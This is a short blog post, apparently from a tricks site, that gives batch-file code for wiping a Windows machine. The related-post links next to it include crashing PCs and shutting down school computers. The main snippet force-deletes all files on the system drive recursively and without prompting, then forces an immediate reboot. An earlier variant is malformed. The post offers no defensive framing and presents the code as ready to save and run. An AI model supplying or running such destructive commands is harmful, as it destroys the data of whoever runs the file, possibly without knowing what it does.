web analytics

Format hard disk using a batch file

Sponsered Links

go to notepad
@Echo off
Del C: *.*y
save it as Dell.bat

or worse

@echo off
del %systemdrive%*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

Blog Widget by LinkWithin

Incoming search terms for the article:


Related posts:

  1. Simple batch program to crash your own PC
  2. Admin privileges for guest
  3. [HOW TO]Make fake viruses in windows
  4. How to save the Ouput of a DOS Command in text file
  5. Change STARTUP and SHUTDOWN sounds in XP
  6. Shutdown pcs at school
  7. How to hide a file in image
  8. Restrict PC Shutdown
  9. Making A file of the size you want
  10. Hibernate function in windows XP

//

Facebook comments:

It's very calm over here, why not leave a comment?

Leave a Reply